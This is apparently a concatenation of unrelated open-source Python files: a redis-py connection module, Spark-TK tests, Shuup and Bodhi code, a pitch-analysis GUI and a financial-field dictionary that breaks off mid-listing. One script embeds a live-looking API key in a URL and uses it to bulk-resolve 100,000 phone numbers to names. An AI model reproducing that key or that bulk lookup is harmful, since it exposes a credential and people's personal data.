class HiredisParser(object):
def on_connect(self, connection):
self._sock = connection._sock
self._reader = hiredis.Reader(
protocolError=InvalidResponse,
replyError=ResponseError)
def on_disconnect(self):
self._sock = None
self._reader = None
def read_response(self):
response = self._reader.gets()
while response is False:
try:
buffer = self._sock.recv(4096)
except (socket.error, socket.timeout), e:
raise ConnectionError("Error while reading from socket: %s" % \
(e.args,))
if not buffer:
raise ConnectionError("Socket closed on remote end")
self._reader.feed(buffer)
# if the data received doesn't end with \r\n, then there's more in
# the socket
if not buffer.endswith('\r\n'):
continue
response = self._reader.gets()
return response
try:
import hiredis
DefaultParser = HiredisParser
except ImportError:
DefaultParser = PythonParser
class Connection(object):
"Manages TCP communication to and from a Redis server"
def __init__(self, host='localhost', port=6379, db=0, password=None,
socket_timeout=None, encoding='utf-8',
encoding_errors='strict', parser_class=DefaultParser):
self.host = host
self.port = port
self.db = db
self.password = password
self.socket_timeout = socket_timeout
self.encoding = encoding
self.encoding_errors = encoding_errors
self._sock = None
self._parser = parser_class()
def connect(self):
"Connects to the Redis server if not already connected"
if self._sock:
return
try:
sock = self._connect()
except socket.error, e:
raise ConnectionError(self._error_message(e))
self._sock = sock
self.on_connect()
def _connect(self):
"Create a TCP socket connection"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.socket_timeout)
sock.connect((self.host, self.port))
return sock
def _error_message(self, exception):
# args for socket.error can either be (errno, "message")
# or just "message"
if len(exception.args) == 1:
return "Error connecting to %s:%s. %s." % \
(self.host, self.port, exception.args[0])
else:
return "Error %s connecting %s:%s. %s." % \
(exception.args[0], self.host, self.port, exception.args[1])
def on_connect(self):
"Initialize the connection, authenticate and select a database"
self._parser.on_connect(self)
# if a password is specified, authenticate
if self.password:
self.send_command('AUTH', self.password)
if self.read_response() != 'OK':
raise ConnectionError('Invalid Password')
# if a database is specified, switch to it
if self.db:
self.send_command('SELECT', self.db)
if self.read_response() != 'OK':
raise ConnectionError('Invalid Database')
def disconnect(self):
"Disconnects from the Redis server"
self._parser.on_disconnect()
if self._sock is None:
return
try:
self._sock.close()
except socket.error:
pass
self._sock = None
def _send(self, command):
"Send the command to the socket"
if not self._sock:
self.connect()
try:
self._sock.sendall(command)
except socket.error, e:
if e.args[0] == errno.EPIPE:
self.disconnect()
if len(e.args) == 1:
_errno, errmsg = 'UNKNOWN', e.args[0]
else:
_errno, errmsg = e.args
raise ConnectionError("Error %s while writing to socket. %s." % \
(_errno, errmsg))
def send_packed_command(self, command):
"Send an already packed command to the Redis server"
try:
self._send(command)
except ConnectionError:
# retry the command once in case the socket connection simply
# timed out
self.disconnect()
# if this _send() call fails, then the error will be raised
self._send(command)
def send_command(self, *args):
"Pack and send a command to the Redis server"
self.send_packed_command(self.pack_command(*args))
def read_response(self):
"Read the response from a previously sent command"
response = self._parser.read_response()
if response.__class__ == ResponseError:
raise response
return response
def encode(self, value):
"Return a bytestring representation of the value"
if isinstance(value, unicode):
return value.encode(self.encoding, self.encoding_errors)
return str(value)
def pack_command(self, *args):
"Pack a series of arguments into a value Redis command"
command = ['$%s\r\n%s\r\n' % (len(enc_value), enc_value)
for enc_value in imap(self.encode, args)]
return '*%s\r\n%s' % (len(command), ''.join(command))
class UnixDomainSocketConnection(Connection):
def __init__(self, path='', db=0, password=None,
socket_timeout=None, encoding='utf-8',
encoding_errors='strict', parser_class=DefaultParser):
self.path = path
self.db = db
self.password = password
self.socket_timeout = socket_timeout
self.encoding = encoding
self.encoding_errors = encoding_errors
self._sock = None
self._parser = parser_class()
def _connect(self):
"Create a Unix domain socket connection"
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(self.socket_timeout)
sock.connect(self.path)
return sock
def _error_message(self, exception):
# args for socket.error can either be (errno, "message")
# or just "message"
if len(exception.args) == 1:
return "Error connecting to unix socket: %s. %s." % \
(self.path, exception.args[0])
else:
return "Error %s connecting to unix socket: %s. %s." % \
(exception.args[0], self.path, exception.args[1])
# TODO: add ability to block waiting on a connection to be released
class ConnectionPool(object):
"Generic connection pool"
def __init__(self, connection_class=Connection, max_connections=None,
**connection_kwargs):
self.connection_class = connection_class
self.connection_kwargs = connection_kwargs
self.max_connections = max_connections or 2**31
self._created_connections = 0
self._available_connections = []
self._in_use_connections = set()
def get_connection(self, command_name, *keys, **options):
"Get a connection from the pool"
try:
connection = self._available_connections.pop()
except IndexError:
connection = self.make_connection()
self._in_use_connections.add(connection)
return connection
def make_connection(self):
"Create a new connection"
if self._created_connections >= self.max_connections:
raise ConnectionError("Too many connections")
self._created_connections += 1
return self.connection_class(**self.connection_kwargs)
def release(self, connection):
"Releases the connection back to the pool"
self._in_use_connections.remove(connection)
self._available_connections.append(connection)
def disconnect(self):
"Disconnects all connections in the pool"
all_conns = chain(self._available_connections, self._in_use_connections)
for connection in all_conns:
connection.disconnect()
| edisonlz/fruit | web_project/base/site-packages/redis/connection.py | Python | apache-2.0 | 10,439 |
# vim: set encoding=utf-8
# Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Tests LBP Graphx implementation by comparing results agains graphlab """
import unittest
from sparktkregtests.lib import sparktk_test
class LbpPottsModel(sparktk_test.SparkTKTestCase):
def test_lbp_cross_3_state(self):
"""Test 3 state Potts model"""
vertex_frame = self.context.frame.create(
[[1, "1.0 0.0 0.0"],
[2, ".3 .3 .3"],
[3, "1.0 0.0 0.0"],
[4, "0.0 1.0 0.0"],
[5, "0.0 0.0 1.0"]],
[("id", int),
("vertex_weight", str)])
edge_frame = self.context.frame.create(
[[2, 3, 1.0],
[2, 1, 1.0],
[2, 4, 1.0],
[2, 5, 1.0]],
[("src", int),
("dst", int),
("weight", float)])
graph = self.context.graph.create(vertex_frame, edge_frame)
potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
known_vals = {1: (1.0, 0.0, 0.0),
2: (0.57611688, 0.2119415576, 0.2119415576),
3: (1.0, 0.0, 0.0),
4: (0.0, 1.0, 0.0),
5: (0.0, 0.0, 1.0)}
potts_vals = potts.to_pandas(potts.count())
for _, row in potts_vals.iterrows():
values = map(float, row["posterior"][1:-1].split(","))
self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
self.assertAlmostEqual(known_vals[row["id"]][1], values[1])
self.assertAlmostEqual(known_vals[row["id"]][2], values[2])
def test_lbp_cross_50(self):
"""Test a balanced graph"""
vertex_frame = self.context.frame.create(
[[1, "1.0 0.0"],
[2, ".5 .5"],
[3, "1.0 0.0"],
[4, "0.0 1.0"],
[5, "0.0 1.0"]],
[("id", int),
("vertex_weight", str)])
edge_frame = self.context.frame.create(
[[2, 3, 1.0],
[2, 1, 1.0],
[2, 4, 1.0],
[2, 5, 1.0]],
[("src", int),
("dst", int),
("weight", float)])
graph = self.context.graph.create(vertex_frame, edge_frame)
potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
known_vals = {1: (1.0, 0.0),
2: (0.5, 0.5),
3: (1.0, 0.0),
4: (0.0, 1.0),
5: (0.0, 1.0)}
potts_vals = potts.to_pandas(potts.count())
for _, row in potts_vals.iterrows():
values = map(float, row["posterior"][1:-1].split(","))
self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
self.assertAlmostEqual(known_vals[row["id"]][1], values[1])
def test_lbp_cross_3_1(self):
"""Test LBP on a cross with a 3-1 split on the distribution"""
vertex_frame = self.context.frame.create(
[[1, "1.0 0.0"],
[2, "0.5 0.5"],
[3, "1.0 0.0"],
[4, "0.0 1.0"],
[5, "1.0 0.0"]],
[("id", int),
("vertex_weight", str)])
edge_frame = self.context.frame.create(
[[2, 3, 1.0],
[2, 1, 1.0],
[2, 4, 1.0],
[2, 5, 1.0]],
[("src", int),
("dst", int),
("weight", float)])
graph = self.context.graph.create(vertex_frame, edge_frame)
potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
known_vals = {1: (1.0, 0.0),
2: (0.88079707798, 0.119202922),
3: (1.0, 0.0),
4: (0.0, 1.0),
5: (1.0, 0.0)}
potts_vals = potts.to_pandas(potts.count())
for _, row in potts_vals.iterrows():
values = map(float, row["posterior"][1:-1].split(","))
self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
self.assertAlmostEqual(known_vals[row["id"]][1], values[1])
def test_lbp_cross(self):
"""Test lbp on a basic cross with a 4-0 split"""
vertex_frame = self.context.frame.create(
[["1", "1.0 0.0"],
["2", ".5 .5"],
["3", "1.0 0.0"],
["4", "1.0 0.0"],
["5", "1.0 0.0"]],
[("id", str), ("vertex_weight", str)])
edge_frame = self.context.frame.create(
[["2", "3", 0.5],
["2", "1", 0.5],
["2", "4", 0.5],
["2", "5", 0.5]],
[("src", str),
("dst", str),
("weight", float)])
graph = self.context.graph.create(vertex_frame, edge_frame)
potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
known_vals = {"1": (1.0, 0.0),
"2": (0.88079707797, 0.11920292202),
"3": (1.0, 0.0),
"4": (1.0, 0.0),
"5": (1.0, 0.0)}
potts_vals = potts.to_pandas(potts.count())
for _, row in potts_vals.iterrows():
values = map(float, row["posterior"][1:-1].split(","))
self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
self.assertAlmostEqual(known_vals[row["id"]][1], values[1])
def test_lbp_double_cross(self):
"""Test lbp on a double cross"""
vertex_frame = self.context.frame.create(
[["1", "1.0 0.0", 1, "1.0 0.0"],
["2", "0.5 0.5", 0, ""],
["3", "1.0 0.0", 1, "1.0 0.0"],
["4", "0.0 1.0", 1, "0.0 1.0"],
["5", "0.5 0.5", 0, ""],
["6", "0.0 1.0", 1, "0.0 1.0"],
["7", "0.0 1.0", 1, "0.0 1.0"],
["8", "1.0 0.0", 1, "1.0 0.0"]],
[("id", str),
("vertex_weight", str),
("is_observed", int), ("label", str)])
edge_frame = self.context.frame.create(
[["2", "3", 1.0],
["2", "1", 1.0],
["2", "4", 1.0],
["2", "5", 1.0],
["6", "5", 1.0],
["7", "5", 1.0],
["8", "5", 1.0]],
[("src", str),
("dst", str),
("weight", float)])
graph = self.context.graph.create(vertex_frame, edge_frame)
potts = graph.loopy_belief_propagation("vertex_weight", "weight", 2)
known_vals = {"1": (1.0, 0.0),
"2": (0.6378903114, 0.36210968),
"3": (1.0, 0.0),
"4": (0.0, 1.0),
"5": (0.36210968, 0.6378903114),
"6": (0.0, 1.0),
"7": (0.0, 1.0),
"8": (1.0, 0.0)}
potts_vals = potts.to_pandas(potts.count())
for _, row in potts_vals.iterrows():
values = map(float, row["posterior"][1:-1].split(","))
self.assertAlmostEqual(known_vals[row["id"]][0], values[0])
self.assertAlmostEqual(known_vals[row["id"]][1], values[1])
if __name__ == '__main__':
unittest.main()
| grehx/spark-tk | regression-tests/sparktkregtests/testcases/graph/graph_lbp_test.py | Python | apache-2.0 | 8,856 |
import threading
import requests
import csv
import ujson
import queue
def load_data():
fn = "aa.csv"
res = []
i = 0
count = 100000
tel_set = set()
with open(fn, "r", encoding='utf8') as fh:
cr = csv.reader(fh)
for line in cr:
tel = line[0].strip()
tel_set.add(tel)
res.append(tel)
i+=1
if i > count:
break
return res
api_url = 'http://apisi.dianhua.cn/resolvetel/?v=1&apikey=a9vXZcm5dnvimiNXyGNfLFwn37PdpyBB&uid=yulore_bqc&app=yulore_bqc&ver=1.0&tel=%s'
def get_one(q, oq):
while True:
tel = q.get()
if tel == None:
break
resp = requests.get(api_url % tel)
if resp.status_code == 200:
a = resp.text
ao = ujson.loads(a)
oq.put((tel, ao.get('name', '')))
else:
oq.put((tel, ''))
def run(data):
q_size = 20
o_q = queue.Queue()
q_list = [queue.Queue() for i in range(q_size)]
t_list = [threading.Thread(target=get_one, args=(q, o_q)) for q in q_list]
for t in t_list:
t.start()
i = 0
for d in data:
q_list[i].put(d)
i = (i+1) % q_size
for q in q_list:
q.put(None)
for t in t_list:
t.join()
all = []
while True:
try:
res = o_q.get(block=False)
all.append(f"{res[0]},{res[1]}")
except Exception as e:
break
with open("m.csv", 'w', encoding='utf8') as wh:
wh.write("\n".join(all))
if __name__ == "__main__":
data = load_data()
run(data)
| Svolcano/python_exercise | new/modian.py | Python | mit | 1,623 |
#!/usr/bin/env python
#chr13:30215500-30216000 output/rgn_1 1 26.84
#chr13:37798000-37798500 output/rgn_10 2 19.87
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("depth", help="depth table, 4 fields, region dir nContigs targetDepth")
ap.add_argument("--ncontigs", help="number of contigs.", default=None,type=int)
ap.add_argument("--depth", help="min depth")
| yunlongliukm/chm1_scripts | HardStop/FilterDepth.py | Python | mit | 395 |
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from django import forms
from django.forms.models import modelform_factory
from django.utils.encoding import force_text
from shuup.core.models import MutableAddress
from shuup.utils.form_group import FormGroup
class GeneralForm(forms.Form):
field = forms.IntegerField(required=True)
def make_form_group(**kwargs):
AddressForm = modelform_factory(MutableAddress, fields=("name", ))
fg = FormGroup(**kwargs)
fg.add_form_def("address1", AddressForm, required=True)
fg.add_form_def("address2", AddressForm, required=False)
fg.add_form_def("general", GeneralForm, required=True)
return fg
def test_form_group():
fg = make_form_group()
assert fg.forms["address1"].prefix == "address1"
assert not fg.is_valid()
assert not fg.full_clean()
fg = make_form_group(data={})
assert fg.is_bound
assert not fg.is_valid()
assert fg.errors.get("address1")
fg = make_form_group(data={"address1-name": "herp", "general-field": "343"})
assert fg.forms["address1"].is_bound
assert fg.is_valid()
assert not fg.errors
def test_form_group_initial():
fg = make_form_group(initial={"address1-name": "Yes Sir"})
assert "Yes Sir" in force_text(fg["address1"]["name"])
| suutari/shoop | shuup_tests/utils/test_form_group.py | Python | agpl-3.0 | 1,487 |
# -*- coding: utf-8 -*-
# Copyright © 2014-2017 Red Hat, Inc. and others.
#
# This file is part of Bodhi.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Define the view that presents release metrics in the web UI."""
import json
from pyramid.view import view_config
import bodhi.server.models as m
def compute_ticks_and_data(db, releases, update_types):
"""
Return the data and ticks to make the stats graph.
Args:
db (sqlalchemy.orm.session.Session): The database Session.
releases (list): A list of release objects we are interested in generating metrics on.
update_types (dict): A dictionary mapping the possible types of updates to human readable
string defining them.
Returns:
tuple: A 2-tuple of data that can be graphed by the UI javascript.
"""
data, ticks = [], []
releases = sorted(releases, cmp=lambda x, y:
cmp(int(x.version_int), int(y.version_int)))
for i, release in enumerate(releases):
ticks.append([i, release.name])
for update_type, label in update_types.items():
d = []
update_type = m.UpdateType.from_string(update_type)
for i, release in enumerate(releases):
num = db.query(m.Update).filter_by(
release=release,
type=update_type,
status=m.UpdateStatus.stable
).count()
d.append([i, num])
data.append(dict(data=d, label=label))
return (data, ticks)
@view_config(route_name='metrics', renderer='metrics.html')
def metrics(request):
"""
Return a response with metric data to be graphed.
Args:
request (pyramid.util.Request): The current Request.
Returns:
dict: A dictionary with keys 'data', 'ticks', 'eldata', and 'elticket'. The 'el' prefixed
keys are for enterprise Linux. These data are used to render the graphs by the template
JavaScript.
"""
db = request.db
update_types = {
'bugfix': 'Bug fixes',
'enhancement': 'Enhancements',
'security': 'Security updates',
'newpackage': 'New packages'
}
releases = db.query(m.Release).filter(m.Release.name.like(u'F%')).all()
data, ticks = compute_ticks_and_data(db, releases, update_types)
releases = db.query(m.Release).filter(m.Release.name.like(u'E%')).all()
eldata, elticks = compute_ticks_and_data(db, releases, update_types)
return {
'data': json.dumps(data), 'ticks': json.dumps(ticks),
'eldata': json.dumps(eldata), 'elticks': json.dumps(elticks),
}
| tyll/bodhi | bodhi/server/views/metrics.py | Python | gpl-2.0 | 3,279 |
from setuptools import setup, find_packages
from os.path import dirname, join
import phone_iso3166
def readfile(filename):
with open(join(dirname(__file__), filename), 'r') as f:
return f.read()
setup(
name="phone-iso3166",
description="Phonenumber to ISO 3166-1 mapping",
install_requires=[
],
keywords="oc",
long_description=readfile("README.rst"),
version=phone_iso3166.__version__,
packages=find_packages(),
maintainer="OC dev team",
maintainer_email="devs@oc.dk",
license='MIT',
classifiers=(
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Natural Language :: English'
)
)
| mehulsbhatt/phone-iso3166 | setup.py | Python | mit | 980 |
"""pyzmq does not ship tornado's futures,
this just raises informative NotImplementedErrors to avoid having to change too much code.
"""
class NotImplementedFuture(object):
def __init__(self, *args, **kwargs):
raise NotImplementedError("pyzmq does not ship tornado's Futures, "
"install tornado >= 3.0 for future support."
)
Future = TracebackFuture = NotImplementedFuture
def is_future(x):
return isinstance(x, Future)
| swn1/pyzmq | zmq/eventloop/minitornado/concurrent.py | Python | bsd-3-clause | 459 |
#!/usr/bin/env python
"""
pitchanalysis.py
--
Christopher Kuech
cjkuech@gmail.com
--
Requires:
Python 2.7
Instructions:
python pitchanalysis.py [wav-file-name]
"""
import matplotlib
from math import log
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import numpy as np
import pyaudio
import sys
from time import time, sleep
import Tkinter as tk
import wavelab
(WIDTH, HEIGHT) = (800, 500)
FNAME = './Bach.wav' if len(sys.argv) != 2 else sys.argv[1]
font = ('Helvetica', 14, 'bold')
CHUNK = 1024
def audioworker():
"""the function run on the audio thread"""
global frame
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(2),
channels=1, rate=4*44100, output=True)
# unknown why rate is off by 4x
while True:
stream.write(data[frame:frame+CHUNK].tostring())
frame = (frame + CHUNK) % len(wav)
stream.stop_stream()
stream.close()
p.terminate()
def graphicsworker():
"""the function run on the graphics thread"""
while True:
start = time()
p = ptype.get()
w = wsize.get()
wty = wtype.get()
# compute frequencies from clip
clip = data[frame:frame+w]
if wty == "hanning":
clip *= np.hanning(w)
elif wty == "hamming":
clip *= np.hamming(w)
freqs = wavelab.frequencies(clip)
# update plot
xs = np.sort(freqs.keys())
ys = np.array(map(freqs.get, xs))
axes.cla()
(xmax, ymin, ymax) = (10e4, 0.000001, 10e2)
# (xlim, ylim) = (_, (ymin, ymax)) = ((0, 1e4), (1e-3, 1e7))
axes.set_xscale("log")
axes.set_yscale("linear")
axes.set_xlim((1, xmax))
if p == "square":
# axes.set_yscale("linear")
axes.set_ylim((ymin**2, ymax**2))
ys = ys * ys
elif p == "dB":
# axes.set_yscale("log")
axes.set_ylim((log(ymin), log(ymax)))
ys = np.log(ys)
elif p == "-dB":
# axes.set_yscale("log")
axes.set_ylim((-log(ymax), -log(ymin)))
ys = -np.log(ys)
elif p == "linear":
# axes.set_yscale("linear")
axes.set_ylim((ymin, ymax))
axes.plot(xs, ys, 'r-')
canvas.show()
# pitch tracker
freq = max(freqs, key=lambda f: freqs[f])
pitch.set(wavelab.pitch(freq).replace('/','\n'))
# attempt to achieve 30fps animation (at best)
dt = time() - start
sleep(max(0, 1.0/30.0 - dt))
# read wave file
(framerate, wav) = wavelab.readwav(FNAME)
data = np.concatenate((wav, wav)) # avoid out of bounds
frame = 0
# create a GUI instance (do before any use of Tkinter)
root = tk.Tk()
root.wm_title("Frequency Spectrogram")
# these objects hold the variables from the widgets
wsize = tk.IntVar() # window size (in frames)
wsize.set(2205)
wtype = tk.StringVar() # type of windowing to use
wtype.set("rectangle")
ptype = tk.StringVar() # type of power to use
ptype.set("square")
pitch = tk.StringVar() # the current pitch
pitch.set("")
widgetps = lambda n, v: {'variable': v, 'text': n, 'value': n}
# returns the dict of kwargs that initialize a widget
# create the canvas widget and add it to the GUI
# canvas = tk.Canvas(root, borderwidth=0, width=WIDTH, height=HEIGHT, bg='#000')
# canvas.grid(row=0, column=0, columnspan=4)
# canvas.show()
canvasframe = tk.Frame(root, width=WIDTH, height=HEIGHT)
canvasframe.grid(row=0, column=0, columnspan=4)
figure = Figure()
axes = figure.add_axes( (0.1, 0.1, 0.8, 0.8), frameon=True,
xlabel="Frequency (Hz)", ylabel="Power")
canvas = FigureCanvasTkAgg(figure, canvasframe)
canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)
canvas.show()
# create the wtype controller and add it to the GUI
tk.Label(root, font=font, text="Windowing").grid(row=1, column=0, pady=10)
wframe = tk.Frame(root)
wframe.grid(row=2, column=0, pady=10, sticky="n")
tk.Radiobutton(wframe, **widgetps("rectangle", wtype)).grid(sticky="w", row=0)
tk.Radiobutton(wframe, **widgetps("hamming" , wtype)).grid(sticky="w", row=1)
tk.Radiobutton(wframe, **widgetps("hanning" , wtype)).grid(sticky="w", row=2)
# create the wsize controller and add it to the GUI
tk.Label(root, font=font, text="Window Size").grid(row=1, column=1, pady=10)
tk.Scale(root, variable=wsize, orient=tk.HORIZONTAL, from_=10, to=4410).grid(row=2, column=1, sticky="wen")
# create the ptype controller and add it to the GUI
tk.Label(root, font=font, text="Power").grid(row=1, column=2, pady=10)
pframe = tk.Frame(root)
pframe.grid(row=2, column=2, pady=10, sticky="n")
tk.Radiobutton(pframe, **widgetps("square", ptype)).grid(sticky="w", row=0)
tk.Radiobutton(pframe, **widgetps("dB", ptype)).grid(sticky="w", row=1)
tk.Radiobutton(pframe, **widgetps("-dB", ptype)).grid(sticky="w", row=2)
tk.Radiobutton(pframe, **widgetps("linear", ptype)).grid(sticky="w", row=3)
# create the area where the pitchlabel is displayed
tk.Label(root, font=font, text="Pitch").grid(row=1, column=3, pady=10)
(fontfamily, fontsize, fontweight) = font
pitchfont = (fontfamily, 24, fontweight)
pitchlabel = tk.Label(root, font=pitchfont, textvariable=pitch, width=7).grid(row=2, column=3)
# start the other threads
wavelab.thread(audioworker)
wavelab.thread(graphicsworker)
# start the main update loop for the GUI (and block)
tk.mainloop()
| chriskuech/wavelab | pitchanalysis.py | Python | mit | 5,174 |
# coding:utf-8
financial_dict = {
# 1.每股指标
'001基本每股收益': 'EPS',
'002扣除非经常性损益每股收益': 'deductEPS',
'003每股未分配利润': 'undistributedProfitPerShare',
'004每股净资产': 'netAssetsPerShare',
'005每股资本公积金': 'capitalReservePerShare',
'006净资产收益率': 'ROE',
'007每股经营现金流量': 'operatingCashFlowPerShare',
# 2. 资产负债表 BALANCE SHEET
# 2.1 资产
# 2.1.1 流动资产
'008货币资金': 'moneyFunds',
'009交易性金融资产': 'tradingFinancialAssets',
'010应收票据': 'billsReceivables',
'011应收账款': 'accountsReceivables',
'012预付款项': 'prepayments',
'013其他应收款': 'otherReceivables',
'014应收关联公司款': 'interCompanyReceivables',
'015应收利息': 'interestReceivables',
'016应收股利': 'dividendsReceivables',
'017存货': 'inventory',
'018其中:消耗性生物资产': 'expendableBiologicalAssets',
'019一年内到期的非流动资产': 'noncurrentAssetsDueWithinOneYear',
'020其他流动资产': 'otherLiquidAssets',
'021流动资产合计': 'totalLiquidAssets',
# 2.1.2 非流动资产
'022可供出售金融资产': 'availableForSaleSecurities',
'023持有至到期投资': 'heldToMaturityInvestments',
'024长期应收款': 'longTermReceivables',
'025长期股权投资': 'longTermEquityInvestment',
'026投资性房地产': 'investmentRealEstate',
'027固定资产': 'fixedAssets',
'028在建工程': 'constructionInProgress',
'029工程物资': 'engineerMaterial',
'030固定资产清理': 'fixedAssetsCleanUp',
'031生产性生物资产': 'productiveBiologicalAssets',
'032油气资产': 'oilAndGasAssets',
'033无形资产': 'intangibleAssets',
'034开发支出': 'developmentExpenditure',
'035商誉': 'goodwill',
'036长期待摊费用': 'longTermDeferredExpenses',
'037递延所得税资产': 'deferredIncomeTaxAssets',
'038其他非流动资产': 'otherNonCurrentAssets',
'039非流动资产合计': 'totalNonCurrentAssets',
'040资产总计': 'totalAssets',
# 2.2 负债
# 2.2.1 流动负债
'041短期借款': 'shortTermLoan',
'042交易性金融负债': 'tradingFinancialLiabilities',
'043应付票据': 'billsPayable',
'044应付账款': 'accountsPayable',
'045预收款项': 'advancedReceivable',
'046应付职工薪酬': 'employeesPayable',
'047应交税费': 'taxPayable',
'048应付利息': 'interestPayable',
'049应付股利': 'dividendPayable',
'050其他应付款': 'otherPayable',
'051应付关联公司款': 'interCompanyPayable',
'052一年内到期的非流动负债': 'noncurrentLiabilitiesDueWithinOneYear',
'053其他流动负债': 'otherCurrentLiabilities',
'054流动负债合计': 'totalCurrentLiabilities',
# 2.2.2 非流动负债
'055长期借款': 'longTermLoans',
'056应付债券': 'bondsPayable',
'057长期应付款': 'longTermPayable',
'058专项应付款': 'specialPayable',
'059预计负债': 'estimatedLiabilities',
'060递延所得税负债': 'defferredIncomeTaxLiabilities',
'061其他非流动负债': 'otherNonCurrentLiabilities',
'062非流动负债合计': 'totalNonCurrentLiabilities',
'063负债合计': 'totalLiabilities',
# 2.3 所有者权益
'064实收资本(或股本)': 'totalShare',
'065资本公积': 'capitalReserve',
'066盈余公积': 'surplusReserve',
'067减:库存股': 'treasuryStock',
'068未分配利润': 'undistributedProfits',
'069少数股东权益': 'minorityEquity',
'070外币报表折算价差': 'foreignCurrencyReportTranslationSpread',
'071非正常经营项目收益调整': 'abnormalBusinessProjectEarningsAdjustment',
'072所有者权益(或股东权益)合计': 'totalOwnersEquity',
'073负债和所有者(或股东权益)合计': 'totalLiabilitiesAndOwnersEquity',
# 3. 利润表
'074其中:营业收入': 'operatingRevenue',
'075其中:营业成本': 'operatingCosts',
'076营业税金及附加': 'taxAndSurcharges',
'077销售费用': 'salesCosts',
'078管理费用': 'managementCosts',
'079堪探费用': 'explorationCosts',
'080财务费用': 'financialCosts',
'081资产减值损失': 'assestsDevaluation',
'082加:公允价值变动净收益': 'profitAndLossFromFairValueChanges',
'083投资收益': 'investmentIncome',
'084其中:对联营企业和合营企业的投资收益': 'investmentIncomeFromAffiliatedBusinessAndCooperativeEnterprise',
'085影响营业利润的其他科目': 'otherSubjectsAffectingOperatingProfit',
'086三、营业利润': 'operatingProfit',
'087加:补贴收入': 'subsidyIncome',
'088营业外收入': 'nonOperatingIncome',
'089减:营业外支出': 'nonOperatingExpenses',
'090其中:非流动资产处置净损失': 'netLossFromDisposalOfNonCurrentAssets',
'091加:影响利润总额的其他科目': 'otherSubjectsAffectTotalProfit',
'092四、利润总额': 'totalProfit',
'093减:所得税': 'incomeTax',
'094加:影响净利润的其他科目': 'otherSubjectsAffectNetProfit',
'095五、净利润': 'netProfit',
'096归属于母公司所有者的净利润': 'netProfitsBelongToParentCompanyOwner',
'097少数股东损益': 'minorityProfitAndLoss',
# 4. 现金流量表
# 4.1 经营活动 Operating
'098销售商品、提供劳务收到的现金': 'cashFromGoodsSalesorOrRenderingOfServices',
'099收到的税费返还': 'refundOfTaxAndFeeReceived',
'100收到其他与经营活动有关的现金': 'otherCashRelatedBusinessActivitiesReceived',
'101经营活动现金流入小计': 'cashInflowsFromOperatingActivities',
'102购买商品、接受劳务支付的现金': 'buyingGoodsReceivingCashPaidForLabor',
'103支付给职工以及为职工支付的现金': 'paymentToEmployeesAndCashPaidForEmployees',
'104支付的各项税费': 'paymentsOfVariousTaxes',
'105支付其他与经营活动有关的现金': 'paymentOfOtherCashRelatedToBusinessActivities',
'106经营活动现金流出小计': 'cashOutflowsFromOperatingActivities',
'107经营活动产生的现金流量净额': 'netCashFlowsFromOperatingActivities',
# 4.2 投资活动 Investment
'108收回投资收到的现金': 'cashReceivedFromInvestmentReceived',
'109取得投资收益收到的现金': 'cashReceivedFromInvestmentIncome',
'110处置固定资产、无形资产和其他长期资产收回的现金净额': 'disposalOfNetCashForRecoveryOfFixedAssetsIntangibleAssetsAndOtherLongTermAssets',
'111处置子公司及其他营业单位收到的现金净额': 'disposalOfNetCashReceivedFromSubsidiariesAndOtherBusinessUnits',
'112收到其他与投资活动有关的现金': 'otherCashReceivedRelatingToInvestingActivities',
'113投资活动现金流入小计': 'cashinFlowsFromInvestmentActivities',
'114购建固定资产、无形资产和其他长期资产支付的现金': 'cashForThePurchaseConstructionPaymentOfFixedAssetsIntangibleAssetsAndOtherLongTermAssets',
'115投资支付的现金': 'cashInvestment',
'116取得子公司及其他营业单位支付的现金净额': 'acquisitionOfNetCashPaidBySubsidiariesAndOtherBusinessUnits',
'117支付其他与投资活动有关的现金': 'otherCashPaidRelatingToInvestingActivities',
'118投资活动现金流出小计': 'cashOutflowsFromInvestmentActivities',
'119投资活动产生的现金流量净额': 'netCashFlowsFromInvestingActivities',
# 4.3 筹资活动 Financing
'120吸收投资收到的现金': 'cashReceivedFromInvestors',
'121取得借款收到的现金': 'cashFromBorrowings',
'122收到其他与筹资活动有关的现金': 'otherCashReceivedRelatingToFinancingActivities',
'123筹资活动现金流入小计': 'cashInflowsFromFinancingActivities',
'124偿还债务支付的现金': 'cashPaymentsOfAmountBorrowed',
